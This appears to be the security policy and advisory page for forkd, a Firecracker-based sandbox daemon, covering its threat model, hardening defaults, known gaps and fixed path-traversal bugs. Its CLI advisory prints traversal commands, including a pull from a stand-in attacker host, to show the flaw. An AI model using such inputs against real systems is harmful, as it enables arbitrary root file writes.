forkd provides KVM-level hardware isolation between sandboxes: each child is a separate Firecracker microVM backed by the host’s KVM hypervisor. Escaping a sandbox requires a hypervisor or kernel vulnerability — the same isolation boundary AWS Lambda relies on — not a runc or namespace regression. The REST API surface, snapshot registry, and audit log are owned by the forkd-controller daemon, which enforces bearer-token authentication and validates all user-controlled input before touching the filesystem or spawning VMs. forkd is alpha software; the guarantees documented here are what the current release delivers, with explicit callouts for items not yet hardened.

Threat model

forkd’s security design rests on three explicit assumptions:
  1. The host kernel and Firecracker are part of the TCB. A compromised host can do anything to the sandboxes running on it. forkd does not attempt to protect against a hostile administrator or a kernel compromise.
  2. Sandboxes are mutually untrusted. Each child VM has its own KVM-backed address space, its own network namespace, and its own cgroup v2 memory limit. A sandbox that escapes its KVM boundary can reach the host, but cannot directly access a peer sandbox’s memory or network traffic.
  3. The daemon’s REST surface is partially trusted. When --token-file is set, possessing the bearer token grants full control over snapshots and sandboxes on that host. Treat the token like a root credential — it is not scoped per-tenant or per-snapshot.

Default security posture

| Concern | Default | How to harden |
| --- | --- | --- |
| Daemon bind | 127.0.0.1:8889 (loopback only) | Override with --bind; pair with --tls-cert + --token-file for any non-loopback address |
| TLS | Off (plain HTTP) | --tls-cert /etc/forkd/tls/cert.pem --tls-key /etc/forkd/tls/key.pem (rustls 0.23, TLS 1.2 + 1.3, no legacy ciphers) |
| Authentication | None | --token-file /etc/forkd/token (required for any non-loopback or multi-tenant deployment) |
| Per-child memory cap | None (uncapped) | Pass memory_limit_mib per sandbox on POST /v1/sandboxes; enforced via cgroup v2 memory.max |
| Per-child network namespace | Shared host bridge | Set per_child_netns: true and run scripts/netns-setup.sh N to isolate each child’s network stack |
| Firecracker seccomp filter | Enabled (Firecracker default) | Already on; no operator action required |
| Guest agent reachability | Inside child netns only | The in-guest agent on :8888 is reachable only from within that child’s netns; the daemon does the setns(2) on your behalf |
| Audit log | /var/log/forkd/audit.log, JSON lines | Tail with Vector / Fluent Bit; rotate with logrotate; feed into your SIEM |
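The memory cap row above maps a per-sandbox memory_limit_mib onto the cgroup v2 memory.max file, which accepts either a byte count or the literal string max. A minimal sketch of that conversion follows. The helper name memory_max_value and the use of Option to model the uncapped default are assumptions for illustration, not forkd's actual code:

```rust
/// Hypothetical helper: render the value written to a cgroup v2 `memory.max` file.
/// `None` models the uncapped default; `Some(mib)` is a per-sandbox limit in MiB.
/// Returns `None` if the limit cannot be expressed as a u64 byte count.
fn memory_max_value(memory_limit_mib: Option<u64>) -> Option<String> {
    match memory_limit_mib {
        // cgroup v2 uses the literal string "max" to mean "no limit".
        None => Some("max".to_string()),
        // memory.max takes bytes; refuse values that would overflow u64.
        Some(mib) => mib.checked_mul(1024 * 1024).map(|bytes| bytes.to_string()),
    }
}
```

Under these assumptions, a 512 MiB limit is written as 536870912, and an absent limit leaves the cgroup at max.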

Kubernetes deployment security

The shipped packaging/k8s/forkd-controller.yaml runs the daemon with privileged: true, runAsUser: 0, and a writable /sys/fs/cgroup hostPath mount. This is necessary: Firecracker needs /dev/kvm, the daemon needs cgroup v2 writes for per-child memory caps, and tap-device creation requires CAP_NET_ADMIN. It also means the blast radius is node-level — a compromised forkd-controller Pod can escape to the underlying node. Operational consequences:
  • Treat the forkd-controller Pod’s bearer token like SSH-root on the node. Rotate it on any access change.
  • Pin the Pod to a dedicated node pool. Do not co-schedule untrusted tenants on the same node.
  • The daemon refuses to start if the manifest’s placeholder token is left in place. Any token beginning with REPLACE_ME or CHANGE_ME, or shorter than 16 bytes, is rejected at startup — a forgotten sed step becomes a noisy fail rather than a silent compromise.
  • For multi-tenant deployments, run one forkd-controller per tenant on dedicated nodes rather than sharing a daemon across tenants.
For tighter security, you can swap privileged: true for a KVM device plugin (e.g. kubevirt/kvm-device-plugin) and enumerate only the capabilities the daemon actually needs (NET_ADMIN + SYS_ADMIN).

Concurrency caps

POST /v1/sandboxes/:id/branch admits at most DEFAULT_BRANCH_CONCURRENCY (currently 4) simultaneous BRANCH operations. Excess requests receive 503 Service Unavailable. The cap bounds peak transient disk usage: each BRANCH writes a full memory.bin, typically 256 MiB to 8 GiB per operation. Tune with --branch-concurrency to match your disk throughput.
Two BRANCH requests targeting the same output tag are serialized via an in-flight deduplication set; the second request gets 409 Conflict.
boot_wait_secs on POST /v1/snapshots is capped at 60 seconds. Without this cap, a caller could tie up a daemon worker indefinitely.
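The BRANCH admission rules above (a fixed number of slots plus a set of in-flight output tags) can be sketched with a mutex-guarded set. The type and method names here (BranchGate, try_admit, finish) are hypothetical, and the order of the two checks is an assumption; the source does not show forkd's real implementation:

```rust
use std::collections::HashSet;
use std::sync::Mutex;

/// Why a BRANCH request was turned away.
#[derive(Debug, PartialEq)]
enum Rejection {
    Busy,     // concurrency cap reached
    Conflict, // same output tag already in flight
}

impl Rejection {
    /// HTTP status the documentation associates with each rejection.
    fn status(&self) -> u16 {
        match self {
            Rejection::Busy => 503,
            Rejection::Conflict => 409,
        }
    }
}

/// Hypothetical admission gate. Each in-flight BRANCH holds exactly one
/// unique tag, so the set's size doubles as the in-flight count.
struct BranchGate {
    limit: usize,
    in_flight: Mutex<HashSet<String>>,
}

impl BranchGate {
    fn new(limit: usize) -> Self {
        BranchGate { limit, in_flight: Mutex::new(HashSet::new()) }
    }

    /// Try to admit a BRANCH that writes to `tag`.
    /// Assumption: the duplicate-tag check runs before the capacity check.
    fn try_admit(&self, tag: &str) -> Result<(), Rejection> {
        let mut tags = self.in_flight.lock().unwrap();
        if tags.contains(tag) {
            return Err(Rejection::Conflict);
        }
        if tags.len() >= self.limit {
            return Err(Rejection::Busy);
        }
        tags.insert(tag.to_string());
        Ok(())
    }

    /// Release the slot once the BRANCH finishes, whether it succeeded or not.
    fn finish(&self, tag: &str) {
        self.in_flight.lock().unwrap().remove(tag);
    }
}
```

With a limit of 4, a fifth concurrent request for a new tag is rejected as Busy (503), and a repeat request for a tag that is still in flight is rejected as Conflict (409). Calling finish frees the slot for the next caller.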

TLS

Pass --tls-cert <cert.pem> and --tls-key <key.pem> to forkd-controller serve (or set FORKD_TLS_CERT / FORKD_TLS_KEY). The daemon uses rustls 0.23 with the aws-lc-rs crypto provider. TLS 1.2 and TLS 1.3 are accepted; legacy cipher suites are not negotiable. Both PEM files must be readable by the daemon’s user and should be mode 0600.
TLS does not automatically enable bearer-token authentication. Supply --token-file as well for any non-loopback deployment — the two protections are independent.
Use a real CA (Let’s Encrypt or your internal PKI). Self-signed certs work but require clients to bypass certificate validation. To rotate: write new files and systemctl restart forkd-controller.

What forkd does not do (yet)

The following items are not yet hardened in the current release. Operators should account for these gaps in their deployment decisions:
  • Default-deny egress. Children share the host’s MASQUERADE rule; outbound traffic to the internet works by default. For an allow-list egress policy, add per-netns iptables rules after running scripts/netns-setup.sh.
  • CPU, I/O, and PID quotas. Only memory.max is wired into ForkOpts. cpu.max, io.max, and pids.max are not yet enforced.
  • Third-party security audit. Not started. A third-party audit will be required before forkd claims a “production” status badge.
  • Multi-node scheduling. One daemon equals one host — no HA, no cross-host failover.

Past advisories

2026-05-17 — snapshot_tag path-traversal in POST /v1/sandboxes (fixed in 0.1.4)

Affected: forkd-controller 0.1.0 through 0.1.3 inclusive.
Fixed in: 0.1.4 (PR #54).
Severity: Medium-High, post-authentication.
Discovered: internal security review during the v0.2 retrospective.
POST /v1/sandboxes accepted req.snapshot_tag from the request body and joined it directly into snapshot_root without calling is_safe_tag. All sister handlers (POST /v1/snapshots, DELETE /v1/snapshots/:tag, POST /v1/sandboxes/:id/branch) validated the tag; create_sandbox alone omitted the check.
The unvalidated tag also persisted into SandboxInfo.snapshot_tag and was later consumed by read_snapshot_volumes during BRANCH, which deserialized the file at <snapshot_root>/<tag>/snapshot.json as a forkd_vmm::Snapshot. An attacker who could write a valid Snapshot-shaped JSON file anywhere on disk and reach the daemon’s REST surface could control the volume specs of grandchild VMs, including mounting arbitrary host block devices into a sandbox.
Impact gating: exploitation requires the bearer token (or a daemon started without --token-file on a non-loopback bind, which already warned at startup). The K8s manifest’s placeholder bearer token (a separate finding in the same PR) made the auth gate brittle if kubectl apply ran without first replacing the Secret.
Fix in 0.1.4:
  • is_safe_tag(&req.snapshot_tag) added to create_sandbox, returning HTTP 400 on invalid input.
  • Defense-in-depth is_safe_tag inside read_snapshot_volumes — refuses to dereference an unsafe tag even if a future caller omits the check.
  • validate_token() rejects REPLACE_ME_* / CHANGE_ME_* prefixes and tokens under 16 bytes at daemon startup.
  • boot_wait_secs on POST /v1/snapshots capped at 60 seconds.
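The startup token rule listed above (placeholder prefixes and a 16-byte minimum) is small enough to sketch directly. The function name check_token, its signature, and the error strings are assumptions; the source names validate_token() but does not show its code:

```rust
/// Hypothetical startup check mirroring the documented rules.
/// Assumes any trailing newline from the token file was stripped beforehand.
fn check_token(token: &str) -> Result<(), &'static str> {
    // Reject the manifest placeholders so a forgotten substitution fails loudly.
    if token.starts_with("REPLACE_ME") || token.starts_with("CHANGE_ME") {
        return Err("placeholder token left in place");
    }
    // `str::len` counts bytes, which matches the 16-byte minimum.
    if token.len() < 16 {
        return Err("token shorter than 16 bytes");
    }
    Ok(())
}
```

A daemon following this pattern would call the check once at startup and exit with the error message rather than serve requests with a weak token.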

2026-05-13 — CLI --tag path-traversal (fixed in 0.1.3)

Affected: forkd CLI 0.1.0 through 0.1.2 inclusive.
Fixed in: 0.1.3.
Severity: High — local file write as the running user; highest impact under the typical sudo forkd execution model.
Discovered: internal bug-bash, May 2026.
CLI commands that accept --tag computed their destination as data_dir().join("snapshots").join(tag). Rust’s Path::join silently discards the base when the right side is absolute, and the implementation did not reject .. segments:
# Writes Firecracker snapshot files to /etc/forkd-bad/
sudo forkd snapshot --tag /etc/forkd-bad ...

# Climbs out of the data dir
sudo forkd snapshot --tag ../../../etc/forkd-bad ...

# Malicious pack: manifest.toml declares tag = "../../etc/x"
sudo forkd pull https://attacker.example/evil.tar.zst
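The join behavior behind the commands above can be reproduced with the standard library alone. The sketch below uses a placeholder data directory (/var/lib/forkd) and a hypothetical function name; it illustrates the vulnerable pattern, not forkd's actual source:

```rust
use std::path::{Path, PathBuf};

/// Mirrors the vulnerable pattern: join an unvalidated tag onto the snapshot directory.
/// `/var/lib/forkd` is a placeholder data directory chosen for illustration.
fn naive_snapshot_dir(tag: &str) -> PathBuf {
    // `join` replaces the base entirely when `tag` is absolute, and it never
    // normalizes `..` components.
    Path::new("/var/lib/forkd").join("snapshots").join(tag)
}
```

On Unix, naive_snapshot_dir("/etc/forkd-bad") evaluates to /etc/forkd-bad because the absolute right-hand side replaces the base. A tag such as ../../../etc/forkd-bad is kept verbatim in the joined path, and the operating system resolves the .. components when the file is opened.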
The same code path is hit by forkd unpack, forkd push, forkd pull, forkd fork, and forkd pack. Under sudo forkd, writes happen as root and files written can be hundreds of MiB to several GiB (memory.bin, vmstate, rootfs.ext4, snapshot.json).
For Snapshot Hub users, a malicious pack with tag = "../../etc/something" in its manifest.toml would write its files anywhere the running user can write on every host that pulls it.
Fix in 0.1.3: validate_tag() is applied at every CLI surface that accepts a tag, and again on the tag field read from manifest.toml inside a pack before any path is derived from it. The allowed tag shape is:
[A-Za-z0-9_][A-Za-z0-9._-]{0,63}
Tags are 1 to 64 characters long and must start with an alphanumeric character or underscore. This rejects empty tags, absolute paths, .. segments, leading dots and dashes, slashes, and shell metacharacters.
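The tag shape can be checked without a regex dependency. The following is a sketch of a whole-string match against [A-Za-z0-9_][A-Za-z0-9._-]{0,63}; the function name is hypothetical and this is not forkd's validate_tag():

```rust
/// Sketch of a check equivalent to `[A-Za-z0-9_][A-Za-z0-9._-]{0,63}`,
/// anchored to the whole string. Hypothetical name, for illustration only.
fn tag_matches_allowed_shape(tag: &str) -> bool {
    let bytes = tag.as_bytes();
    // 1 to 64 characters; every allowed character is a single ASCII byte.
    if bytes.is_empty() || bytes.len() > 64 {
        return false;
    }
    // First character: alphanumeric or underscore only.
    let first_ok = bytes[0].is_ascii_alphanumeric() || bytes[0] == b'_';
    // Remaining characters may also include '.', '_' and '-'.
    let rest_ok = bytes[1..]
        .iter()
        .all(|&b| b.is_ascii_alphanumeric() || matches!(b, b'.' | b'_' | b'-'));
    first_ok && rest_ok
}
```

A tag such as a..b still passes this check. That is harmless here: with slashes and leading dots excluded, the dots can never form a standalone .. path segment.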

Reporting a vulnerability

Email security@deeplethe.com. Do not open a public GitHub issue for security reports. We aim to acknowledge within 72 hours and ship a fix or mitigation within 14 days for confirmed issues.

Supported versions

Pre-1.0 releases receive fixes only on the latest minor release. The CHANGELOG records which API versions are affected by each advisory.
